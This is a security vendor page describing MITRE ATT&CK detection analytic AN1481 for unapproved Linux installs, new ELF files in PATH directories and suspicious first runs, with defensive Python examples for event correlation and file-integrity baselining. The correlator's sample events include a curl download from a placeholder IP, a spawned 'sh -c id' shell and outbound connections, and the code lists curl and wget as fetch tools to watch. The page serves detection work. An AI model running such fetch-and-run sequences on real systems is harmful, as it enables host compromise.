AN1481: Analytic 1481
1) Package manager or curl/wget installs/upgrades from non-approved repos or unsigned packages; 2) new ELF written into PATH directories or replacement of existing binaries/libraries; 3) first run leads to unexpected child processes or outbound connections.
Analyst context for executives and security teams
This analytic is relevant to Linux software supply-chain and host integrity risk: it focuses on signs that software was installed or changed outside approved channels, that executable files appeared in trusted PATH locations, and that the first execution behaved unexpectedly. For leaders, the value is not just malware detection; it is validating whether Linux change control, package trust, and endpoint telemetry can prove that critical systems are running approved code.
Executive priority
Prioritize this where Linux systems support production services, privileged administration, regulated workloads, or incident-response evidence requirements. The business question is whether the organization can distinguish approved software maintenance from unauthorized binary or library replacement quickly enough to protect service continuity and support audit or investigation needs. This also helps guide investment in Linux endpoint visibility, repository governance, and change-control evidence.
Technical view
SOC and detection teams should validate coverage for Linux events involving package managers, curl/wget-based downloads, unsigned or non-approved repository sources, file creation or replacement in PATH directories, ELF file writes, binary/library replacement, first execution behavior, child process creation, and outbound network connections after first run. Because no ATT&CK tactic or official detection logic is supplied, this should be treated as a detection analytic concept that requires local tuning against approved repositories, maintenance tooling, golden images, and expected administrative workflows.
Likely telemetry
- Linux package manager logs and repository configuration state
- Process execution telemetry for package managers, curl, wget, newly written ELF files, and first-run activity
- File creation, modification, and replacement events in PATH directories and library locations
- File metadata or integrity data that can identify ELF binaries and changed executables/libraries
- Network connection telemetry from Linux hosts, especially outbound connections following first execution
Detection direction
- Build allowlists or policy baselines for approved Linux repositories, signed packages, and sanctioned software deployment methods.
- Correlate non-approved or unsigned install activity with creation or replacement of ELF files in PATH directories and subsequent first-run behavior.
- Tune out expected administrative maintenance, build pipelines, and configuration management activity to reduce false positives.
- Pay special attention to sequences where a new or replaced executable starts unexpected child processes or initiates outbound connections.
- Validate whether endpoint telemetry can reliably observe file writes, process ancestry, and network connections on Linux; missing any one of these weakens the analytic.
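The three-stage correlation described in this list, as an added example that is not part of the MITRE object or Glexia's own tooling. It walks a stream of per-host events (package installs, file writes with the first bytes of the file, process executions with parent pids, outbound connections) and only raises an alert when a non-approved or unsigned install, or a curl/wget run, is followed within a tuning window by an ELF landing directly in a PATH directory, and that file's first run then spawns a child not on its allowlist or connects out. Event field names, the approved-repository set, PATH directories, the window and every sample event are constructed for the example; the hosts, packages and addresses are not real.

```python
"""Three-stage correlation for AN1481 over constructed Linux telemetry.
Stage 1: install from a non-approved repo or unsigned package, or a curl/wget run
         (assumed to arrive as a process_exec event).
Stage 2: an ELF written directly into a PATH directory within WINDOW seconds.
Stage 3: that file runs and spawns an unexpected child or connects outbound.
Event field names, policy values and sample events are all constructed here."""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional

APPROVED_REPOS = {"deb.debian.org", "security.debian.org", "mirror.corp.example"}
PATH_DIRS = ("/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin")
FETCH_TOOLS = {"curl", "wget"}
EXPECTED_CHILDREN: Dict[str, set] = {}  # binary path -> child comm names that are normal
WINDOW = 600                             # seconds allowed between stage 1 and stage 2
ELF_MAGIC = b"\x7fELF"


def is_elf(header: bytes) -> bool:
    """True if the first bytes written to the file carry the ELF magic."""
    return header[:4] == ELF_MAGIC


def in_path_dir(path: str) -> bool:
    """True if the file sits directly inside one of the PATH directories."""
    return path.rsplit("/", 1)[0] in PATH_DIRS


@dataclass
class HostState:
    install_at: Optional[float] = None                        # time of the stage-1 event
    install_reason: str = ""
    new_elf: Dict[str, float] = field(default_factory=dict)   # path -> write time
    tracked: Dict[int, str] = field(default_factory=dict)     # pid -> binary on first run


def correlate(events: List[dict]) -> List[dict]:
    """Walk events in time order per host and return stage-3 alerts."""
    hosts: Dict[str, HostState] = defaultdict(HostState)
    alerts: List[dict] = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        st, kind = hosts[ev["host"]], ev["kind"]
        if kind == "pkg_install":
            if ev["repo"] not in APPROVED_REPOS or not ev["signed"]:
                st.install_at = ev["ts"]
                st.install_reason = f"{ev['package']} from {ev['repo']} signed={ev['signed']}"
        elif kind == "file_write":
            # stage 2 only counts close enough after stage 1; tune WINDOW locally
            if st.install_at is None or ev["ts"] - st.install_at > WINDOW:
                continue
            if in_path_dir(ev["path"]) and is_elf(ev["header"]):
                st.new_elf[ev["path"]] = ev["ts"]
        elif kind == "process_exec":
            if ev["exe"] in st.new_elf:                       # first run of the new ELF
                st.tracked[ev["pid"]] = ev["exe"]
            elif ev["ppid"] in st.tracked:                    # child of the new ELF
                parent = st.tracked[ev["ppid"]]
                if ev["comm"] not in EXPECTED_CHILDREN.get(parent, set()):
                    alerts.append({"host": ev["host"], "ts": ev["ts"], "binary": parent,
                                   "what": f"child process {ev['comm']}: {ev.get('cmdline', '')}",
                                   "install": st.install_reason})
            elif ev["comm"] in FETCH_TOOLS:                   # ad hoc download counts as stage 1
                st.install_at = ev["ts"]
                st.install_reason = ev.get("cmdline", ev["comm"])
        elif kind == "net_connect" and ev["pid"] in st.tracked:
            alerts.append({"host": ev["host"], "ts": ev["ts"], "binary": st.tracked[ev["pid"]],
                           "what": f"outbound connection to {ev['dst']}",
                           "install": st.install_reason})
    return alerts


ELF = b"\x7fELF\x02\x01\x01\x00"   # 64-bit little-endian ELF header prefix, constructed


def E(host, ts, kind, **fields):
    return dict(host=host, ts=ts, kind=kind, **fields)


SAMPLE_EVENTS = [   # constructed; hosts, packages and addresses are not real
    # web01: unsigned package from an unknown repo, new ELF in PATH, first run misbehaves
    E("web01", 1000, "pkg_install", package="netutil", repo="pkgs.example.net", signed=False),
    E("web01", 1010, "file_write", path="/usr/local/bin/netutil", header=ELF),
    E("web01", 1011, "file_write", path="/etc/netutil.conf", header=b"# config"),
    E("web01", 1020, "process_exec", pid=4242, ppid=1, exe="/usr/local/bin/netutil", comm="netutil"),
    E("web01", 1021, "process_exec", pid=4243, ppid=4242, exe="/bin/sh", comm="sh", cmdline="sh -c id"),
    E("web01", 1022, "net_connect", pid=4242, dst="203.0.113.10:443"),
    # build01: signed package from an approved mirror replaces a binary; no stage 1, no alert
    E("build01", 2000, "pkg_install", package="vim", repo="deb.debian.org", signed=True),
    E("build01", 2010, "file_write", path="/usr/bin/vim", header=ELF),
    E("build01", 2020, "process_exec", pid=5000, ppid=1, exe="/usr/bin/vim", comm="vim"),
    # db01: curl fetch, but the ELF lands 900 s later, outside WINDOW, so stage 2 never fires
    E("db01", 3000, "process_exec", pid=7000, ppid=900, exe="/usr/bin/curl", comm="curl",
      cmdline="curl -o /tmp/agent http://203.0.113.7/agent"),
    E("db01", 3900, "file_write", path="/usr/local/sbin/agent", header=ELF),
    E("db01", 3910, "process_exec", pid=7100, ppid=1, exe="/usr/local/sbin/agent", comm="agent"),
    E("db01", 3911, "net_connect", pid=7100, dst="203.0.113.7:8443"),
]


def run_sample() -> List[dict]:
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

On the sample, only web01 produces alerts (one for the shell child, one for the outbound connection); build01 never enters stage 1 because its repository is approved and the package is signed, and db01 shows the cost of the window: the curl run is recorded, but the ELF write arrives too late to be tied to it. That last case is the tuning trade-off the list above describes, and EXPECTED_CHILDREN is where sanctioned maintenance tooling would be allowlisted per binary.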
Mitigation priorities
- Define and enforce approved Linux package repositories and package signing expectations.
- Limit ad hoc software retrieval through curl/wget on managed servers where operationally feasible.
- Protect trusted executable and library paths with least privilege, file integrity monitoring, and controlled administrative workflows.
- Maintain software inventory and change-control evidence so suspicious installs can be compared against approved activity.
- Ensure incident responders can quickly collect package logs, process history, file metadata, and network evidence from affected Linux hosts.
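The file integrity monitoring called for above, reduced to a baseline-and-compare check over PATH directories, as an added example that is not part of the MITRE object or Glexia's own tooling. It records a SHA-256, the ELF magic, mode and owner for every regular file in the watched directories, then classifies the differences between two snapshots so that a new ELF or a replaced executable stands out from ordinary file churn. The demo runs against a temporary directory standing in for /usr/local/bin, with constructed files whose ELF headers are fake; the watched directory list is an assumption to be replaced with the host's real PATH.

```python
"""Baseline-and-compare integrity check for executables in PATH directories.
Added example; the demo uses a temp directory and constructed files, not real binaries."""
import hashlib
import os
import stat
import tempfile
from typing import Dict, List

ELF_MAGIC = b"\x7fELF"


def snapshot(dirs: List[str]) -> Dict[str, dict]:
    """Record sha256, ELF-ness, mode and owner for every regular file in dirs."""
    baseline: Dict[str, dict] = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            p = os.path.join(d, name)
            st = os.lstat(p)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets and devices are out of scope here
            h = hashlib.sha256()
            with open(p, "rb") as f:
                head = f.read(4)
                h.update(head)
                for chunk in iter(lambda: f.read(1 << 16), b""):
                    h.update(chunk)
            baseline[p] = {"sha256": h.hexdigest(), "elf": head == ELF_MAGIC,
                           "mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid}
    return baseline


def compare(before: Dict[str, dict], after: Dict[str, dict]) -> Dict[str, list]:
    """Classify differences; new or replaced ELF files are the AN1481 stage-2 signal."""
    out: Dict[str, list] = {"new_elf": [], "new_other": [], "replaced": [], "removed": []}
    for p, info in after.items():
        if p not in before:
            (out["new_elf"] if info["elf"] else out["new_other"]).append(p)
        elif any(info[k] != before[p][k] for k in ("sha256", "mode", "uid")):
            out["replaced"].append(p)  # content, permission or owner changed in place
    out["removed"] = [p for p in before if p not in after]
    return out


def demo() -> Dict[str, list]:
    """Constructed scenario: a temp dir stands in for /usr/local/bin."""
    fake_elf = b"\x7fELF\x02\x01\x01" + b"\x00" * 9   # fake 64-bit ELF header, not loadable
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "helper"), "wb") as f:
            f.write(fake_elf + b"v1")
        with open(os.path.join(d, "wrapper.sh"), "wb") as f:
            f.write(b"#!/bin/sh\nexec /usr/bin/true\n")
        before = snapshot([d])
        # unapproved install drops a new ELF, replaces helper in place, and adds a text file
        with open(os.path.join(d, "agent"), "wb") as f:
            f.write(fake_elf + b"payload")
        with open(os.path.join(d, "helper"), "wb") as f:
            f.write(fake_elf + b"v2")
        with open(os.path.join(d, "notes.txt"), "wb") as f:
            f.write(b"not code")
        result = compare(before, snapshot([d]))
    # report basenames so the temp path does not leak into the result
    return {k: sorted(os.path.basename(p) for p in v) for k, v in result.items()}


if __name__ == "__main__":
    print(demo())
```

Against the sample, the new fake ELF is reported under new_elf, the rewritten helper under replaced, and the text file under new_other, which is the split an analyst wants when deciding what to escalate. In production the baseline would be taken from a golden image or written at deployment time, stored off-host, and re-compared on a schedule or on inotify events, with the snapshot limited to directories and library paths that change control says should be static.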
Analyst notes and limits
The supplied ATT&CK object is a detection analytic for Linux, not a technique description. Its practical strength is correlation: suspicious install source, executable or library change in trusted locations, and unexpected behavior on first execution. Glexia would use this to assess Linux monitoring maturity, repository governance, and IR evidence readiness rather than to infer a specific adversary or campaign.
Official detection text, tactics, relationships, aliases, and labels were not provided. No active exploitation, attribution, impact, or guaranteed detection coverage can be inferred. Effective use depends on local definitions of approved repositories, expected maintenance behavior, PATH locations, logging depth, and endpoint/network telemetry retention.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources page under Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 276c11d15f18… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack AN1481
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.